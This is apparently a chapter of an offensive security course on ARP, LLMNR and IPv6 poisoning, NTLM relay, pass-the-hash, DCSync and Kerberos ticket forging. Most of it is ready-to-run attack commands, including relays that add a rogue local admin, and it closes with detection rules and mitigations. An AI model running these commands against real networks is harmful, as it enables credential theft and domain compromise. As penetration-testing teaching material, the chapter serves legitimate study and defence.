Chapter 3.3 - Man-in-the-Middle, Spoofing & Lateral Movement
Module 3: Offensive Security & Exploitation Prerequisites: Chapter 3.2 (Exploitation Techniques)
Table of Contents
- Network Interception Fundamentals - ARP, LLMNR & NBNS
- ARP Poisoning & Layer-2 MITM
- LLMNR/NBT-NS Poisoning & NTLM Capture
- SMB Relay Attacks - Credential Relay to RCE
- DNS Spoofing & BGP Hijacking
- IPv6 Attacks - SLAAC Abuse & DHCPv6 Spoofing
- Lateral Movement in Active Directory Environments
- Kerberos Attacks - Kerberoasting, AS-REP Roasting & Pass-the-Ticket
- Defensive Detections & Mitigations
- MITRE ATT&CK Mapping
1. Network Interception Fundamentals - ARP, LLMNR & NBNS
Man-in-the-middle attacks position an attacker between two communicating parties, enabling passive interception, active modification, or credential capture. On modern Ethernet networks, the attack surface divides into three protocol families - each with different scope, requirements, and detection characteristics.
Why These Protocols Are Exploitable
| Protocol | Purpose | Vulnerability | Scope |
|---|---|---|---|
| ARP | Map IP to MAC on local segment | Stateless, no authentication; any host can claim any IP | Local subnet only |
| LLMNR | Resolve hostnames when DNS fails | Responds to any query; no source validation | Local subnet only |
| NBT-NS | NetBIOS name resolution (legacy) | Same as LLMNR | Local subnet only |
| mDNS | Multicast DNS (Bonjour/Avahi) | No authentication on announcements | Local subnet only |
| DHCPv6 | IPv6 address assignment | Rogue server wins if responds faster | Local subnet only |
| DNS | Global name resolution | Cache poisoning, rogue server | Network-wide |
All of the local-segment attacks share a common property: they exploit unauthenticated broadcast/multicast protocols where the first responder wins. This is a design characteristic, not a bug - these protocols were designed for efficiency on trusted LANs that no longer exist.
2. ARP Poisoning & Layer-2 MITM
ARP (Address Resolution Protocol) maps IP addresses to MAC addresses on a local subnet. It is completely stateless - a host will update its ARP cache whenever it receives an ARP reply, whether it requested one or not. An attacker sends gratuitous ARP replies claiming to be the default gateway (to intercept all outbound traffic) or specific hosts (to intercept point-to-point traffic).
ARP Poisoning with arpspoof
# Enable IP forwarding - CRITICAL: without this, you drop all traffic (DoS)
echo 1 > /proc/sys/net/ipv4/ip_forward
# Make permanent:
sysctl -w net.ipv4.ip_forward=1
echo "net.ipv4.ip_forward = 1" >> /etc/sysctl.conf
# ARP spoof - tell victim (192.168.1.100) that gateway (192.168.1.1) is us
arpspoof -i eth0 \ # Interface
-t 192.168.1.100 \ # Target (victim) IP
192.168.1.1 # IP to impersonate (gateway)
# Run in background: arpspoof ... &
# ARP spoof the other direction - tell gateway that victim is us
arpspoof -i eth0 \
-t 192.168.1.1 \ # Target (gateway)
192.168.1.100 # IP to impersonate (victim)
# Both directions must run simultaneously for bidirectional MITM
# Run each in a separate terminal or background them
ARP Poisoning with Bettercap
Bettercap is the modern standard for MITM attacks - it handles ARP poisoning, sniffing, and protocol capture in an integrated framework:
# Install bettercap
apt install bettercap
# Or: go install github.com/bettercap/bettercap@latest
# Interactive mode
bettercap -iface eth0
# Inside bettercap interactive console:
> net.probe on # Discover hosts on subnet
> net.show # Show discovered hosts
# ARP spoof specific target
> set arp.spoof.targets 192.168.1.100 # Victim IP
> arp.spoof on # Start poisoning (auto-enables IP forwarding)
# Sniff HTTP traffic
> net.sniff on # Passive sniffer
> set net.sniff.verbose true
# HTTP proxy (inspect/modify HTTP traffic in flight)
> http.proxy on
> set http.proxy.injectjs "alert('MITM')" # Inject JavaScript into all HTTP pages
# HTTPS downgrade / stripping (when HSTS not enforced)
> https.proxy on
# Capture credentials from captured traffic
> set net.sniff.regexp ".*password.*" # Filter for password strings
> net.sniff on
# Caplets - scripted bettercap sessions
cat > /tmp/arp_mitm.cap << 'EOF'
net.probe on
sleep 3
set arp.spoof.targets 192.168.1.100
arp.spoof on
net.sniff on
EOF
bettercap -iface eth0 -caplet /tmp/arp_mitm.cap
Capturing Traffic During MITM
# Capture all traffic between victim and gateway during ARP poison
tcpdump -i eth0 \
-w /tmp/mitm_capture.pcap \
host 192.168.1.100 # Capture only victim's traffic
# Filter for cleartext credentials in captured traffic
tcpdump -r /tmp/mitm_capture.pcap -A | \
grep -iE "password|passwd|login|credential|Authorization"
# Extract HTTP objects from capture
tcpdump -r /tmp/mitm_capture.pcap -w - | \
tcpflow -r - -o /tmp/http_objects/ # Extract TCP streams
# Or use Wireshark/tshark for protocol-aware extraction
tshark -r /tmp/mitm_capture.pcap \
-Y 'http.request.method == "POST"' \
-T fields \
-e ip.src -e http.host -e http.request.uri -e http.file_data
3. LLMNR/NBT-NS Poisoning & NTLM Capture
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Windows fallback name resolution protocols used when DNS fails. When a Windows host cannot resolve a hostname via DNS, it broadcasts an LLMNR query to the subnet. Any host can respond - including an attacker.
The attack flow:
- Victim types
\\fileserver\shareor a typo like\\filesrver\docs- DNS fails - Windows falls back to LLMNR broadcast: "Who is 'filesrver'?"
- Attacker's Responder responds: "I am 'filesrver', authenticate to me"
- Windows sends NTLM authentication - attacker captures the NTLMv2 hash
- Hash is cracked offline or relayed to authenticate elsewhere
Responder - LLMNR/NBT-NS/mDNS Poisoner
# Responder listens on a network interface and answers all name queries
# Configuration file: /etc/responder/Responder.conf
# Basic run - capture NTLMv2 hashes from all name resolution failures
responder -I eth0 \ # Listen interface
-rdw \ # r: answer NETBIOS queries
# d: enable DHCP poisoning
# w: start WPAD rogue server
-v # Verbose
# Responder output shows captured hashes:
# [SMB] NTLMv2-SSP Client : 192.168.1.105
# [SMB] NTLMv2-SSP Username : CORP\jsmith
# [SMB] NTLMv2-SSP Hash : jsmith::CORP:aabbccdd...:1122334455...
# Captured hashes are saved to /var/log/responder/
ls /var/log/responder/
cat /var/log/responder/SMB-NTLMv2-SSP-192.168.1.105.txt
Cracking NTLMv2 Hashes
# hashcat - GPU-accelerated hash cracking
# Mode 5600 = NTLMv2 (NetNTLMv2)
hashcat -m 5600 \ # Hash type: NTLMv2
/var/log/responder/SMB-NTLMv2-SSP-*.txt \ # Captured hash files
/usr/share/wordlists/rockyou.txt \ # Wordlist
-r /usr/share/hashcat/rules/best64.rule \ # Apply mutation rules
--force \ # Ignore warnings
-O # Optimized kernels (faster)
# Show cracked passwords
hashcat -m 5600 /var/log/responder/SMB-NTLMv2-SSP-*.txt --show
# Rule-based attack (much higher hit rate than plain wordlist)
hashcat -m 5600 hashes.txt \
/usr/share/wordlists/rockyou.txt \
-r /usr/share/hashcat/rules/d3ad0ne.rule \ # Extensive mutation rules
-r /usr/share/hashcat/rules/toggles1.rule
# Mask attack - when password policy is known (e.g., 8+ chars, 1 uppercase, 1 digit)
hashcat -m 5600 hashes.txt \
-a 3 \ # Attack mode: mask
"?u?l?l?l?l?l?d?d" # ?u=upper ?l=lower ?d=digit
# john the ripper alternative
john --format=netntlmv2 \
--wordlist=/usr/share/wordlists/rockyou.txt \
/var/log/responder/SMB-NTLMv2-SSP-*.txt
4. SMB Relay Attacks - Credential Relay to RCE
Rather than cracking NTLMv2 hashes (which can take hours/days for strong passwords), SMB relay attacks use the captured authentication in real time, relaying it to another host to gain an authenticated session - no cracking required.
Prerequisite: The target host must have SMB signing disabled. Domain Controllers have signing enabled by default; workstations often do not.
Attack Setup - Responder + ntlmrelayx
# Step 1: Disable Responder's SMB and HTTP servers
# (ntlmrelayx will handle these protocols instead)
sed -i 's/SMB = On/SMB = Off/' /etc/responder/Responder.conf
sed -i 's/HTTP = On/HTTP = Off/' /etc/responder/Responder.conf
# Step 2: Build relay target list (hosts with signing disabled)
cme smb 192.168.1.0/24 \
--gen-relay-list /tmp/relay_targets.txt
# Only includes hosts where signing=False
# Step 3: Start Responder (LLMNR/NBT-NS poisoning only, no SMB/HTTP server)
responder -I eth0 -rdw &
# Step 4: Start ntlmrelayx targeting the relay list
impacket-ntlmrelayx \
-tf /tmp/relay_targets.txt \ # Target list
-smb2support \ # Support SMB2
-socks # Create SOCKS proxy per relayed session
# (allows reuse without re-authentication)
# Alternative: execute a command on relay success
impacket-ntlmrelayx \
-tf /tmp/relay_targets.txt \
-smb2support \
-c "net user hacker P@ssword123! /add && net localgroup administrators hacker /add"
# Adds a local admin account on every successfully relayed host
# Alternative: dump SAM database on relay success
impacket-ntlmrelayx \
-tf /tmp/relay_targets.txt \
-smb2support \
--dump-lm # Dump local SAM hashes on each relayed session
Using Relayed Sessions via SOCKS
# ntlmrelayx with -socks creates authenticated SOCKS connections
# List active relayed sessions
> socks
# Output:
# Protocol Target Username AdminStatus Port
# SMB 192.168.1.150 CORP\jsmith TRUE 1081
# SMB 192.168.1.151 CORP\jsmith TRUE 1082
# Connect to relayed sessions via proxychains
# /etc/proxychains4.conf: socks4 127.0.0.1 1081
proxychains impacket-secretsdump \
CORP/jsmith@192.168.1.150 \
-no-pass # Auth via SOCKS relay - no password needed
proxychains impacket-psexec \
CORP/jsmith@192.168.1.150 \
-no-pass # Interactive shell via relay
HTTP/HTTPS Relay (WebDAV & WPAD)
NTLM authentication is not limited to SMB - it also occurs in HTTP/HTTPS contexts (WebDAV, OWA, WPAD proxy auto-config). ntlmrelayx can relay HTTP authentication to SMB and vice versa:
# Relay HTTP NTLM to SMB
impacket-ntlmrelayx \
-tf /tmp/relay_targets.txt \
-smb2support \
--http-port 80 \ # Accept incoming HTTP NTLM
-socks
# WPAD poisoning - force all Windows hosts to authenticate to attacker's proxy
# Responder handles this with -w flag:
# Windows requests http://wpad/wpad.dat - Responder claims to be WPAD server
# Windows sends NTLM credentials to "authenticate" to the proxy
responder -I eth0 -rdw --wpad
5. DNS Spoofing & BGP Hijacking
DNS Cache Poisoning
DNS cache poisoning injects fraudulent records into a recursive resolver's cache, redirecting all users of that resolver to attacker-controlled infrastructure. The classic Kaminsky attack (2008) exploits the predictability of transaction IDs and source ports.
# dnschef - DNS proxy for targeted spoofing (testing/pentest contexts)
# Spoofs resolution for specific domains while passing others through
dnschef \
--fakeip 192.168.1.50 \ # IP to return for spoofed domains
--fakedomains "target-corp.com,*.target-corp.com" \ # Domains to spoof
--nameservers 8.8.8.8 \ # Forward all other queries here
--interface 0.0.0.0 \
--port 53
# Bettercap DNS spoofing (during ARP MITM - redirect DNS through your server)
> set dns.spoof.domains target-corp.com,*.target-corp.com
> set dns.spoof.address 192.168.1.50 # Return your IP for spoofed domains
> dns.spoof on
> arp.spoof on # Must be MITM to intercept DNS queries
# Verify DNS spoofing is working from victim's perspective
# (on victim machine or simulate with dig through specific server)
dig @192.168.1.50 target-corp.com # Query your DNS server directly
Testing Your Own Infrastructure for Cache Poisoning Vulnerability
# Check if your resolver randomizes source ports (Kaminsky patch)
# Low port entropy = vulnerable to classic cache poisoning
dig +short @YOUR_RESOLVER example.com # Run many times and capture response times
# DNS Security Extensions (DNSSEC) validation test
dig @YOUR_RESOLVER dnssec-failed.org # Should return SERVFAIL if DNSSEC enforced
dig @YOUR_RESOLVER dnssec-failed.org +cd # With checking disabled - should return data
# Check if DNSSEC is enabled on your zone
dig @ns1.yourdomain.com yourdomain.com DNSKEY
dig @ns1.yourdomain.com yourdomain.com DS
6. IPv6 Attacks - SLAAC Abuse & DHCPv6 Spoofing
IPv6 is enabled by default on all modern Windows, Linux, and macOS systems - and almost universally misconfigured in enterprise environments. Most organizations have IPv4 security controls but no equivalent IPv6 monitoring or filtering. Attackers exploit this gap.
mitm6 - DHCPv6 + DNS Spoofing
mitm6 exploits Windows' preference for IPv6 over IPv4. It sends DHCPv6 responses assigning itself as the IPv6 default gateway and DNS server. Windows will then use the attacker's DNS server for all queries - and when DNS fails, fall back to LLMNR/NBT-NS over IPv6.
# mitm6 - respond to DHCPv6 requests, become the IPv6 DNS server
pip install mitm6
# or: git clone https://github.com/dirkjanm/mitm6
# Basic run - attack all hosts on the subnet
mitm6 -d corp.local \ # Domain name (for WPAD targeting)
-i eth0 \
-v # Verbose
# Target specific hosts only
mitm6 -d corp.local -hw WORKSTATION01 -i eth0
# mitm6 + ntlmrelayx - combined attack
# Terminal 1: mitm6
mitm6 -d corp.local -i eth0
# Terminal 2: ntlmrelayx (relay captured NTLM over IPv6 to IPv4 targets)
impacket-ntlmrelayx \
-6 \ # Listen on IPv6
-tf /tmp/relay_targets.txt \ # IPv4 targets (signing disabled)
-smb2support \
-socks \
-wh attacker-wpad.corp.local # WPAD hostname to serve
# The flow:
# 1. mitm6 assigns attacker as IPv6 DNS server via DHCPv6
# 2. Windows requests WPAD configuration via IPv6 DNS
# 3. ntlmrelayx serves WPAD requiring NTLM authentication
# 4. Windows authenticates - ntlmrelayx relays to SMB targets
# 5. Attacker gets authenticated sessions to all signing-disabled hosts
7. Lateral Movement in Active Directory Environments
Once a foothold is established, lateral movement spreads access across the network. Active Directory environments provide rich lateral movement opportunities because credentials and trust relationships are centralized.
Pass-the-Hash & Pass-the-Ticket
# Pass-the-Hash - use NTLM hash without knowing plaintext password
# Requires: NTLM hash of a local admin account on target
# psexec (creates a service - noisy, leaves artifacts)
impacket-psexec \
"CORP/Administrator@192.168.1.150" \
-hashes :aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
# wmiexec (no service creation - stealthier)
impacket-wmiexec \
"CORP/Administrator@192.168.1.150" \
-hashes :NTLM_HASH_HERE \
"whoami /all" # Run single command and exit
# smbexec (uses existing shares, no service)
impacket-smbexec \
"CORP/Administrator@192.168.1.150" \
-hashes :NTLM_HASH_HERE
# atexec (uses Task Scheduler - async)
impacket-atexec \
"CORP/Administrator@192.168.1.150" \
-hashes :NTLM_HASH_HERE \
"net user"
# CrackMapExec sweep - test hash against entire subnet
cme smb 192.168.1.0/24 \
-u Administrator \
-H :NTLM_HASH_HERE \
--local-auth \ # Use local account (not domain)
-x "hostname" # Execute command on all successful hosts
WMI Lateral Movement
Windows Management Instrumentation (WMI) allows remote management and code execution - heavily used by both admins and attackers because it is built-in and often allowed by firewall rules:
# wmiexec - execute commands via WMI (requires credentials or hash)
impacket-wmiexec \
CORP/jsmith:Password123@192.168.1.150
# PowerShell WMI (from already-compromised Windows host)
Invoke-WmiMethod \
-ComputerName TARGET \
-Class Win32_Process \
-Name Create \
-ArgumentList "powershell -enc [base64_encoded_command]"
# CrackMapExec via WMI
cme wmi 192.168.1.0/24 \
-u jsmith -p 'Password123' \
-x "net localgroup administrators" # Check who's local admin on each host
PowerShell Remoting (WinRM)
WinRM (Windows Remote Management) runs on port 5985 (HTTP) and 5986 (HTTPS). Members of the Remote Management Users group or local administrators can connect:
# Check WinRM access with CrackMapExec
cme winrm 192.168.1.0/24 \
-u jsmith -p 'Password123'
# Pwn3d! = WinRM access + admin rights
# [+] = WinRM access, non-admin
# evil-winrm - interactive WinRM shell
evil-winrm \
-i 192.168.1.150 \
-u jsmith \
-p 'Password123'
# Or with hash:
evil-winrm -i 192.168.1.150 -u Administrator -H NTLM_HASH
# Inside evil-winrm:
*Evil-WinRM* PS> whoami
*Evil-WinRM* PS> upload /tmp/tool.exe C:\Windows\Temp\tool.exe
*Evil-WinRM* PS> download C:\Users\admin\Documents\creds.txt
*Evil-WinRM* PS> services # List services
*Evil-WinRM* PS> Invoke-Binary /tmp/compiled.exe # Run uploaded binary
DCSync - Domain Credential Replication
DCSync abuses the Directory Replication Service (DRS) protocol to pull password hashes directly from a Domain Controller without logging on to it. Requires DS-Replication-Get-Changes-All privilege - held by Domain Admins, Enterprise Admins, and any account explicitly granted it.
# DCSync with Impacket secretsdump
impacket-secretsdump \
"CORP/DomainAdmin:Password@192.168.1.10" \ # DC IP
-just-dc \ # Only pull DC secrets (faster)
-outputfile /tmp/dcsync_hashes # Save output
# DCSync specific account only
impacket-secretsdump \
"CORP/DomainAdmin:Password@192.168.1.10" \
-just-dc-user "krbtgt" \ # Get krbtgt hash (Golden Ticket prep)
-just-dc-user "Administrator"
# DCSync from Meterpreter (Mimikatz/Kiwi extension)
meterpreter > load kiwi
meterpreter > dcsync_ntlm krbtgt # Get krbtgt NTLM hash
meterpreter > dcsync_ntlm Administrator # Get DA hash
# Output: NTLM hash of krbtgt - used to forge Golden Tickets
8. Kerberos Attacks - Kerberoasting, AS-REP Roasting & Pass-the-Ticket
Kerberos is the default authentication protocol in Active Directory. Its ticket-based architecture introduces unique attack vectors that do not exist in NTLM authentication.
Kerberos Ticket Flow
Client - KDC (AS-REQ) - TGT issued (encrypted with krbtgt hash)
Client - KDC (TGS-REQ, presents TGT) - Service Ticket issued (encrypted with service account hash)
Client - Service (presents Service Ticket) - Access granted
The critical insight: service tickets are encrypted with the service account's NTLM hash. Any domain user can request a service ticket for any SPN. If the service account uses a weak password, the ticket can be cracked offline.
Kerberoasting
# Step 1: Find accounts with Service Principal Names (SPNs registered)
# These are the targets - their tickets can be requested and cracked
impacket-GetUserSPNs \
"CORP/jsmith:Password123@192.168.1.10" \ # Any domain credential
-dc-ip 192.168.1.10 \
-request \ # Also request the tickets
-outputfile /tmp/kerberoast_hashes.txt
# Alternative: using ldapsearch (from Chapter 3.1)
ldapsearch -x -h 192.168.1.10 \
-D "jsmith@corp.local" -w 'Password123' \
-b "DC=corp,DC=local" \
"(&(objectclass=user)(servicePrincipalName=*))" \
sAMAccountName servicePrincipalName
# Step 2: Crack TGS tickets (hashcat mode 13100 = Kerberos TGS-REP etype 23)
hashcat -m 13100 \
/tmp/kerberoast_hashes.txt \
/usr/share/wordlists/rockyou.txt \
-r /usr/share/hashcat/rules/best64.rule \
-O
# Kerberoasting from Windows (PowerView)
# Import-Module .\PowerView.ps1
# Get-DomainUser -SPN -Properties SamAccountName,ServicePrincipalName
# Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File kerberoast.txt
AS-REP Roasting
Accounts with "Do not require Kerberos preauthentication" enabled will return an AS-REP message encrypted with the user's password hash - without requiring any prior authentication. This hash is crackable offline.
# Find accounts with preauthentication disabled
impacket-GetNPUsers \
"CORP/" \ # Domain
-usersfile /tmp/users.txt \ # Username list (from LDAP enumeration)
-dc-ip 192.168.1.10 \
-format hashcat \ # Output format for hashcat
-outputfile /tmp/asrep_hashes.txt \
-no-pass # No credentials needed
# With credentials (more reliable - LDAP query for vulnerable accounts)
impacket-GetNPUsers \
"CORP/jsmith:Password123" \
-dc-ip 192.168.1.10 \
-format hashcat \
-outputfile /tmp/asrep_hashes.txt
# Crack AS-REP hashes (hashcat mode 18200 = Kerberos AS-REP etype 23)
hashcat -m 18200 \
/tmp/asrep_hashes.txt \
/usr/share/wordlists/rockyou.txt \
-r /usr/share/hashcat/rules/best64.rule
Pass-the-Ticket (PtT)
Kerberos tickets (TGTs and Service Tickets) can be extracted from memory and reused on other machines - no password or hash required.
# Extract tickets from memory (Mimikatz on Windows)
# sekurlsa::tickets /export - Export all tickets to .kirbi files
# kerberos::list /export - List and export from Kerberos cache
# From Meterpreter:
meterpreter > load kiwi
meterpreter > kerberos_ticket_list # List all Kerberos tickets in memory
meterpreter > kerberos_ticket_use /tmp/Administrator.kirbi # Import a ticket
# Dump tickets with Rubeus (Windows, .NET)
# .\Rubeus.exe dump /nowrap - Dump all TGTs
# .\Rubeus.exe tgtdeleg /nowrap - Downgrade and dump usable TGT
# Pass-the-Ticket with Impacket
export KRB5CCNAME=/tmp/administrator.ccache # Set ticket cache
impacket-psexec \
-k \ # Use Kerberos authentication
-no-pass \ # No password - use ticket
CORP/Administrator@dc01.corp.local # Must use FQDN for Kerberos
# Verify ticket is working
klist # List cached Kerberos tickets
Golden Ticket Attack
With the krbtgt NTLM hash (obtained via DCSync), an attacker can forge a Ticket Granting Ticket (TGT) for any user, with any group memberships, valid for any duration. This is the ultimate AD persistence mechanism - survives password resets of all accounts except krbtgt.
# Requirements:
# - krbtgt NTLM hash (from DCSync)
# - Domain SID (from LDAP or secretsdump output)
# - Domain name (FQDN)
# Get domain SID
impacket-lookupsid \
"CORP/jsmith:Password123@192.168.1.10"
# Output: CORP-S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX (domain SID)
# Forge Golden Ticket with Impacket
impacket-ticketer \
-nthash KRBTGT_NTLM_HASH \ # krbtgt hash from DCSync
-domain-sid S-1-5-21-XXXX-XXXX-XXXX \ # Domain SID
-domain corp.local \ # Domain FQDN
-groups 512 \ # Group 512 = Domain Admins
-duration 3650 \ # Valid for 3650 days
backdoor_admin # Username in the ticket (can be anything)
# Use the Golden Ticket
export KRB5CCNAME=backdoor_admin.ccache
impacket-psexec -k -no-pass CORP/backdoor_admin@dc01.corp.local
# Silver Ticket - forge service ticket for specific service (stealthier)
# Uses service account hash instead of krbtgt hash
impacket-ticketer \
-nthash SERVICE_ACCOUNT_HASH \ # Target service account hash
-domain-sid S-1-5-21-XXXX \
-domain corp.local \
-spn cifs/fileserver.corp.local \ # Target SPN
jsmith # Username to impersonate
9. Defensive Detections & Mitigations
Detecting LLMNR/NBT-NS Poisoning
# Suricata - detect Responder's characteristic LLMNR responses
alert udp any 5355 -> $HOME_NET any (
msg:"LLMNR Response from Unexpected Host - Possible Poisoning";
content:"|00 00 84 00|"; # LLMNR response flag bytes
threshold:type threshold, track by_src, count 5, seconds 10;
classtype:network-scan;
sid:9005001; rev:1;
)
# Disable LLMNR via Group Policy (the correct fix)
# Computer Configuration - Administrative Templates - Network -
# DNS Client - Turn off multicast name resolution - Enabled
# Disable NBT-NS via DHCP (option 43) or registry:
# HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\
# NetbiosOptions = 2 (disabled)
# PowerShell: disable NBT-NS on all adapters
$adapters = Get-WmiObject Win32_NetworkAdapterConfiguration | Where-Object {$_.IPEnabled}
foreach ($adapter in $adapters) {
$adapter.SetTcpipNetbios(2) # 2 = Disable NetBIOS over TCP/IP
}
Detecting Kerberoasting
# Windows Event Log - Kerberoasting generates Event ID 4769
# (Kerberos Service Ticket was requested)
# Suspicious characteristics:
# - TicketEncryptionType = 0x17 (RC4-HMAC) - modern environments use AES
# - Many 4769 events from a single source in short time
# - Service accounts requested by non-service accounts
# PowerShell query for suspicious 4769 events
Get-WinEvent -FilterHashtable @{
LogName = 'Security'
Id = 4769
StartTime = (Get-Date).AddHours(-1)
} | Where-Object {
$_.Properties[5].Value -eq '0x17' # RC4 encryption
} | Select-Object TimeCreated, @{N='User';E={$_.Properties[0].Value}},
@{N='Service';E={$_.Properties[2].Value}},
@{N='SourceIP';E={$_.Properties[9].Value}}
Mitigating Kerberos Attacks
# Enforce AES encryption - prevents RC4-based Kerberoasting (hashes harder to crack)
# GPO: Computer Configuration - Windows Settings - Security Settings -
# Account Policies - Kerberos Policy - "Configure encryption types allowed"
# Only check: AES128_HMAC_SHA1, AES256_HMAC_SHA1
# Managed Service Accounts (gMSA) - 240-char auto-rotating passwords
# Makes Kerberoasting computationally infeasible
New-ADServiceAccount -Name "svc-web" `
-DNSHostName "svc-web.corp.local" `
-PrincipalsAllowedToRetrieveManagedPassword "WebServers" # Group of servers
# Enable Kerberos Pre-Authentication on all accounts (prevents AS-REP Roasting)
# In AD Users and Computers: Account tab -
# Uncheck "Do not require Kerberos preauthentication"
# Bulk fix via PowerShell:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} |
Set-ADUser -DoesNotRequirePreAuth $false
# Protect krbtgt account (prevents Golden Ticket attacks)
# Reset krbtgt password twice (invalidates all existing tickets)
# Use Microsoft's krbtgt reset script:
# https://github.com/microsoft/New-KrbtgtKeys.ps1
.\New-KrbtgtKeys.ps1 -Mode WhatIf # Preview impact
.\New-KrbtgtKeys.ps1 -Mode Reset # Execute (do twice, 10 hours apart)
Detecting DCSync
# DCSync generates Event ID 4662 (An operation was performed on an object)
# with specific GUID patterns for DS-Replication-Get-Changes-All
# SIEM query - detect non-DC accounts performing DCSync
# Look for: Event 4662, ObjectType contains "domainDNS"
# AND accesses contain "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" (Replicating Directory Changes All)
# AND SubjectUserName NOT IN (list of DC machine accounts)
# Microsoft Defender for Identity (formerly ATA) detects DCSync natively
# Network-based: DCSync uses MS-DRSR RPC over port 135 + dynamic high ports
# A non-DC machine making MS-DRSR calls to port 135 on the DC is anomalous
# Suricata rule to detect:
alert tcp $HOME_NET any -> $DC_NET 135 (
msg:"Possible DCSync - Non-DC RPC to Domain Controller";
flow:established,to_server;
content:"|05 00 0b|"; # DCE/RPC Bind header
classtype:suspicious-activity;
sid:9005002; rev:1;
)
10. MITRE ATT&CK Mapping
| Technique | ID | Method | Detection |
|---|---|---|---|
| LLMNR/NBT-NS Poisoning and SMB Relay | T1557.001 | Responder, ntlmrelayx | Disable LLMNR/NBT-NS, enforce signing |
| ARP Cache Poisoning | T1557.002 | arpspoof, bettercap | Dynamic ARP Inspection (DAI), static entries |
| Adversary-in-the-Middle | T1557 | MITM full attack chain | Network monitoring, HTTPS/HSTS |
| Steal or Forge Kerberos Tickets: Kerberoasting | T1558.003 | GetUserSPNs, Rubeus | Event 4769, AES enforcement, gMSA |
| Steal or Forge Kerberos Tickets: AS-REP Roasting | T1558.004 | GetNPUsers | Enforce preauth, Event 4768 |
| Golden Ticket | T1558.001 | ticketer, Mimikatz | Detect non-DC DCSync, krbtgt rotation |
| Pass the Hash | T1550.002 | psexec, wmiexec, CME | Credential Guard, disable NTLMv1 |
| Pass the Ticket | T1550.003 | kirbi import, Rubeus | Event 4768/4769 anomalies |
| Remote Services: SMB/Windows Admin Shares | T1021.002 | psexec, smbexec | Event 7045, monitor ADMIN$ access |
| Remote Services: Windows Remote Management | T1021.006 | evil-winrm | Restrict WinRM, enable PowerShell logging |
| OS Credential Dumping: DCSync | T1003.006 | secretsdump, Mimikatz | Event 4662, MDI alerts |
| Use Alternate Authentication Material | T1550 | PtH, PtT, Golden Ticket | Privileged Identity Management |
End of Chapter 3.3 - Man-in-the-Middle, Spoofing & Lateral Movement
Next: Chapter 3.4 - Wireless & VPN Attack Techniques